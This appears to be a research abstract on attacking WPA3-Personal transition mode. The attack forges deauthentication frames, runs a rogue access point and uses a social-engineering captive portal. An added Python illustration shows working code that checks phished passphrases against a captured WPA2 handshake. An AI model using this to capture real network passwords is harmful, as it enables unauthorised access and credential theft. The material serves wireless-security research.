Wi-Fi Protected Access 3 (WPA3) is the accepted standard for next-generation wireless security. WPA3 introduces new features that allow for increased security of Wi-Fi networks. One such feature is Simultaneous Authentication of Equals (SAE), a Password Authenticated Key Exchange in which the passphrase is combined with contributions from both the Access Point and the client, so that a captured handshake cannot be used for an offline dictionary attack against the password (Harkins, Dan. 2019). The objective of this research paper is to bypass WPA3-SAE and acquire the network password via a Man-in-the-Middle attack combined with social engineering. This method can prove useful given that the majority of network attacks stem from social engineering. This research examines the security of WPA3-Personal transition mode and captures the network password via a captive portal. Breaching a WPA3 network is possible by building on various security flaws that were disclosed in WPA3 in 2021. The Dragonblood downgrade attacks disclosed in 2019 showed that WPA2/WPA3 handshakes could be acquired. The proposed Man-in-the-Middle setup uses race conditions to deauthenticate clients from the WPA3 network and then uses a Raspberry Pi to spawn a rogue WPA3 network. The handshake acquired can then be used to verify the password entered in the captive portal of the rogue WPA3 network. This research found that the password could be recovered through the social engineering captive portal when Protected Management Frames are not implemented, since without them the deauthentication frames used to push clients onto the rogue network are not authenticated and can be forged. This research also indicates that some devices are not able to connect to a WPA3 transition network, which contradicts the Wi-Fi Alliance claim that it is backwards compatible with WPA2.
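The step the abstract relies on, checking a captive-portal submission against a previously captured handshake, only works for the WPA2 side of a transition network: an SAE exchange yields nothing offline-verifiable, but a client that connects (or is downgraded) with WPA2-PSK derives its PMK from PBKDF2 over the passphrase and SSID, and the MIC it sends in message 2 of the four-way handshake can be recomputed for any candidate passphrase. The following Python is an added illustration of that offline check; it is not code from the paper or its authors. The SSID, MAC addresses, nonces and the EAPOL message 2 frame are constructed locally under a known passphrase so the example runs without a capture; in practice those fields would be parsed from the pcap of the deauthenticated client's reconnection, and the only portal-side change is to call `verify_passphrase` on each submitted value.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Offsets inside an EAPOL-Key frame (802.11 key descriptor): the 16-byte MIC
# field begins at byte 81 and is zeroed before the MIC is computed.
MIC_OFFSET = 81
MIC_LEN = 16


@dataclass
class Handshake:
    """Fields an attacker extracts from a captured WPA2 four-way handshake."""
    ssid: str
    ap_mac: bytes        # authenticator address (6 bytes)
    client_mac: bytes    # supplicant address (6 bytes)
    anonce: bytes        # from message 1
    snonce: bytes        # from message 2
    eapol_msg2: bytes    # full EAPOL-Key message 2, MIC field as sent
    mic: bytes           # MIC the client actually sent in message 2


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512 built from HMAC-SHA1 (four counter-indexed iterations)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC for AKM 00-0F-AC:2 (WPA2-PSK/CCMP): HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def verify_passphrase(hs: Handshake, candidate: str) -> bool:
    """True if `candidate` reproduces the MIC the real client sent (offline, no AP contact needed)."""
    pmk = pmk_from_passphrase(candidate, hs.ssid)
    kck = derive_ptk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]  # KCK = PTK[0:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic)


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (Key Info 0x010a: pairwise, MIC bit, HMAC-SHA1/AES descriptor v2).
    Layout: descriptor type(1) key info(2) key len(2) replay(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16) data len(2)."""
    body = (b"\x02" + (0x010A).to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * MIC_LEN + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = EAPOL-Key


def make_constructed_handshake(passphrase: str, ssid: str) -> Handshake:
    """Stand-in for a pcap capture (constructed data): synthesise a client's message 2 under a known passphrase."""
    ap_mac = bytes.fromhex("020000000001")       # constructed locally administered addresses
    client_mac = bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"anonce").digest()  # fixed rather than random so the example is reproducible
    snonce = hashlib.sha256(b"snonce").digest()
    frame = build_eapol_msg2(snonce)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, frame, mic)


if __name__ == "__main__":
    hs = make_constructed_handshake("correct horse battery", "LabNet")
    for guess in ("password123", "correct horse battery"):
        print(f"{guess!r}: {'accepted' if verify_passphrase(hs, guess) else 'rejected'}")
```

The check is what makes the portal credible: a victim who mistypes the password is told so and prompted again, while a correct entry can be confirmed without ever contacting the legitimate AP. The same derivation is why the paper's premise holds only in transition mode; a client that negotiates SAE produces a PMK with no passphrase-to-MIC relationship that can be tested offline.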